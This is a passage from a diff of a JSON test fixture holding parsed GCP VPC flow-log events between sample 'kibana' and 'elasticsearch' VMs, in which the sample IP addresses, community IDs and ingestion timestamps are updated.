pc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392374300Z", + "original": 
"{\"insertId\":\"1gq7q7afe373eo\",\"jsonPayload\":{\"bytes_sent\":\"12145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"94\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466779642Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -21678,9 +21678,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65319, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21694,7 +21694,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:KwNXrQ3LrN8XseQR+n3DlXZgE84=", + "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", "bytes": 178669, "transport": "tcp", "type": "ipv4", @@ -21709,7 +21709,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -21733,8 +21733,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869207500Z", - "original": "{\"insertId\":\"1gq7q7afe373fb\",\"jsonPayload\":{\"bytes_sent\":\"178669\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65319,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"634\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392379900Z", + "original": 
"{\"insertId\":\"1gq7q7afe373fb\",\"jsonPayload\":{\"bytes_sent\":\"178669\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65319,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"634\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740597880Z", "end": "2019-06-14T03:49:56.220617595Z", @@ -21755,10 +21755,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -21772,7 +21772,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VI3r5tULP+rnInZrp9gsYAw2kGA=", + "community_id": "1:LgPQaxqGyF5gYr06s0NCzKofgOo=", "bytes": 62066, "name": "default", "transport": "tcp", @@ -21795,7 +21795,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -21831,8 +21831,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869210200Z", - "original": "{\"insertId\":\"1gq7q7afe373fs\",\"jsonPayload\":{\"bytes_sent\":\"62066\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"359\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392386300Z", + "original": 
"{\"insertId\":\"1gq7q7afe373fs\",\"jsonPayload\":{\"bytes_sent\":\"62066\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"359\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:51.789258875Z", @@ -21859,18 +21859,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33970, "bytes": 13440, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 96 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:scGILrXad9XwMVy45aBpAVcS9Bc=", + "community_id": "1:IK2yh3vtbZJ4V3I3kIgCeSldo3I=", "bytes": 13440, "name": "default", "transport": "tcp", @@ -21892,7 +21892,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -21929,8 +21929,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869212900Z", - "original": "{\"insertId\":\"1gq7q7afe373ei\",\"jsonPayload\":{\"bytes_sent\":\"13440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392389600Z", + "original": 
"{\"insertId\":\"1gq7q7afe373ei\",\"jsonPayload\":{\"bytes_sent\":\"13440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -21951,10 +21951,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33966, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21968,7 +21968,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:JeEMpLpISUoKidiacbnV1gCPvyA=", + "community_id": "1:7RYpCdauzSw7iSF8Ox56BXoCZls=", "bytes": 368131, "name": "default", "transport": "tcp", @@ -21991,7 +21991,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -22027,8 +22027,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869215700Z", - "original": "{\"insertId\":\"1gq7q7afe373ez\",\"jsonPayload\":{\"bytes_sent\":\"368131\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.800931420Z\",\"packets_sent\":\"76\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392394100Z", + "original": 
"{\"insertId\":\"1gq7q7afe373ez\",\"jsonPayload\":{\"bytes_sent\":\"368131\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.800931420Z\",\"packets_sent\":\"76\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510698570Z", "end": "2019-06-14T03:49:50.800931420Z", @@ -22049,10 +22049,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -22066,7 +22066,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:egds7+adPwr8MrtaK+oAyWTmtL0=", + "community_id": "1:Xg3OPnd3ZD+LZsCDrlk/Kdj91e8=", "bytes": 66258, "name": "default", "transport": "tcp", @@ -22089,7 +22089,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -22125,8 +22125,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869218500Z", - "original": "{\"insertId\":\"1gq7q7afe373fh\",\"jsonPayload\":{\"bytes_sent\":\"66258\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"365\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392399300Z", + "original": 
"{\"insertId\":\"1gq7q7afe373fh\",\"jsonPayload\":{\"bytes_sent\":\"66258\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"365\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -22155,17 +22155,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65276, "bytes": 76976, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 749 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:BPNXWYQI8he7USxOsykyWmD0NE8=", + "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", "bytes": 76976, "transport": "tcp", "type": "ipv4", @@ -22179,7 +22179,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -22204,8 +22204,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869221100Z", - "original": "{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392404100Z", + "original": 
"{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760349279Z", "end": "2019-06-14T03:49:56.220621567Z", @@ -22234,17 +22234,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65319, "bytes": 72967, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 747 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KwNXrQ3LrN8XseQR+n3DlXZgE84=", + "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", "bytes": 72967, "transport": "tcp", "type": "ipv4", @@ -22258,7 +22258,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -22283,8 +22283,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869223800Z", - "original": "{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392408100Z", + "original": 
"{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740597880Z", "end": "2019-06-14T03:49:56.220617595Z", @@ -22311,17 +22311,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 50364, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 9 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:peICi+mlxd/skeLBLZFlScKlq64=", + "community_id": "1:0TTLV6IDTX3Y7z7HtKV0pV2QKHY=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -22335,7 +22335,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -22360,8 +22360,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869226600Z", - "original": "{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392412600Z", + "original": 
